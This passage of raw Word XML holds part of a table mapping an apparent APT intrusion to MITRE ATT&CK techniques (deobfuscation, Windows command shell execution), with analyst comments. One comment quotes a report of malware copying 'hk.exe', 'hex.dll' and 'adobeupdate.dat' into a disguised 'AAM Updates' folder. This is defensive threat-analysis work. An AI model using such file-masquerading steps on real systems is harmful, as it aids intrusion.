                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BBB2247" w14:textId="00FF1035" w:rsidR="00DA24A4" w:rsidRPr="0076617D" w:rsidRDefault="004F08FA" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="751EC8A5" w14:textId="05D31A6B" w:rsidR="00DA24A4" w:rsidRPr="0076617D" w:rsidRDefault="004F08FA" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39044D64" w14:textId="77777777" w:rsidR="00DA24A4" w:rsidRPr="0076617D" w:rsidRDefault="00DA24A4" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7519BB15" w14:textId="6889B434" w:rsidR="00DA24A4" w:rsidRPr="0076617D" w:rsidRDefault="004F08FA" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="772B18F3" w14:textId="06B13051" w:rsidR="00DA24A4" w:rsidRPr="0076617D" w:rsidRDefault="00992EC7" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B691A16" w14:textId="030C6726" w:rsidR="00DA24A4" w:rsidRPr="0076617D" w:rsidRDefault="007664E0" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F08FA" w:rsidRPr="00B857D7" w14:paraId="417FB57A" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33EB10E9" w14:textId="103B5561" w:rsidR="004F08FA" w:rsidRDefault="007664E0" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BF49A2D" w14:textId="5F065016" w:rsidR="004F08FA" w:rsidRPr="00B857D7" w:rsidRDefault="007664E0" w:rsidP="00473869">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0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51CBA0E4" w14:textId="03571B42" w:rsidR="004F08FA" w:rsidRPr="00B857D7" w:rsidRDefault="007664E0" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007664E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BE81DED" w14:textId="4F47279B" w:rsidR="004F08FA" w:rsidRDefault="007664E0" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62D0D16E" w14:textId="77777777" w:rsidR="004F08FA" w:rsidRPr="00B857D7" w:rsidRDefault="004F08FA" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FFF5BF9" w14:textId="77C73614" w:rsidR="004F08FA" w:rsidRDefault="007664E0" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="027858B2" w14:textId="161534C6" w:rsidR="004F08FA" w:rsidRPr="00B857D7" w:rsidRDefault="00B42656" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="583B2F8D" w14:textId="77777777" w:rsidR="004F08FA" w:rsidRDefault="007664E0" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>As above. The execution method is not clear so this is a holding suggestion (from known Tech use of this APT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DEF543E" w14:textId="21EC5103" w:rsidR="00E731E0" w:rsidRPr="00B857D7" w:rsidRDefault="00E731E0" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See also [2] for additional suggestions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0076617D" w:rsidRPr="0076617D" w14:paraId="27974CDD" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DF288A3" w14:textId="37CA0513" w:rsidR="0039479E" w:rsidRPr="0076617D" w:rsidRDefault="00E731E0" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C70B5A6" w14:textId="77777777" w:rsidR="0039479E" w:rsidRPr="0076617D" w:rsidRDefault="0039479E" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AF57260" w14:textId="77777777" w:rsidR="0039479E" w:rsidRPr="0076617D" w:rsidRDefault="0039479E" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4531BB3F" w14:textId="2D7B4D68" w:rsidR="0039479E" w:rsidRPr="0076617D" w:rsidRDefault="00E731E0" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE928B8" w14:textId="77777777" w:rsidR="0039479E" w:rsidRPr="0076617D" w:rsidRDefault="0039479E" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ECBE399" w14:textId="77777777" w:rsidR="0039479E" w:rsidRPr="0076617D" w:rsidRDefault="0039479E" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EE74CBB" w14:textId="44134310" w:rsidR="0039479E" w:rsidRPr="0076617D" w:rsidRDefault="00992EC7" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A778E35" w14:textId="77777777" w:rsidR="0039479E" w:rsidRPr="0076617D" w:rsidRDefault="0039479E" w:rsidP="00473869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0076617D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE0D13" w:rsidRPr="00B857D7" w14:paraId="4F490D0C" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="177C2801" w14:textId="5B79DA55" w:rsidR="00CE0D13" w:rsidRDefault="00E731E0" w:rsidP="00CE0D13">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1117716D" w14:textId="7976AA6A" w:rsidR="00CE0D13" w:rsidRPr="00B857D7" w:rsidRDefault="00CE0D13" w:rsidP="00CE0D13">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0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2818" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B672BE1" w14:textId="587491AD" w:rsidR="00CE0D13" w:rsidRPr="00B857D7" w:rsidRDefault="00CE0D13" w:rsidP="00CE0D13">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007664E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="500B22F1" w14:textId="38B5B8F4" w:rsidR="00CE0D13" w:rsidRDefault="00616289" w:rsidP="00CE0D13">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="564846F9" w14:textId="77777777" w:rsidR="00CE0D13" w:rsidRPr="00B857D7" w:rsidRDefault="00CE0D13" w:rsidP="00CE0D13">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DD7ACFA" w14:textId="6EF40D69" w:rsidR="00CE0D13" w:rsidRDefault="00CE0D13" w:rsidP="00CE0D13">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4613C996" w14:textId="35C3F31A" w:rsidR="00CE0D13" w:rsidRPr="00B857D7" w:rsidRDefault="00B42656" w:rsidP="00CE0D13">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00992EC7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2285" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C7B8FDC" w14:textId="00CA8F17" w:rsidR="00443FE3" w:rsidRDefault="00443FE3" w:rsidP="00CE0D13">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See also above</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E01455" w14:textId="77777777" w:rsidR="0076617D" w:rsidRDefault="0076617D" w:rsidP="00CE0D13">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0029665F" w14:textId="0CB023C9" w:rsidR="00CE0D13" w:rsidRPr="00B857D7" w:rsidRDefault="001C583E" w:rsidP="00CE0D13">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00CE0D13" w:rsidRPr="00CE0D13">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Next, “hk.exe” is executed and creates copies of the files “adobeupdate.dat,” “hex.dll,” and itself renamed as “AAM Updates.exe” in the folder “C:\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00CE0D13" w:rsidRPr="00CE0D13">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>ProgramData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00CE0D13" w:rsidRPr="00CE0D13">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">\AAM </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00CE0D13" w:rsidRPr="00CE0D13">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>UpdatesIIw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00CE0D13" w:rsidRPr="00CE0D13">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00485A81" w:rsidRPr="00B857D7" w14:paraId="5D5F614D" w14:textId="77777777" w:rsidTr="007D27AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A65AA9E" w14:textId="30ABF19E" w:rsidR="00485A81" w:rsidRDefault="00485A81" w:rsidP="00485A81">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E731E0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="494F2E90" w14:textId="6C6B98C4" w:rsidR="00485A81" w:rsidRPr="00B857D7" w:rsidRDefault="00485A81" w:rsidP="00485A81">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0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
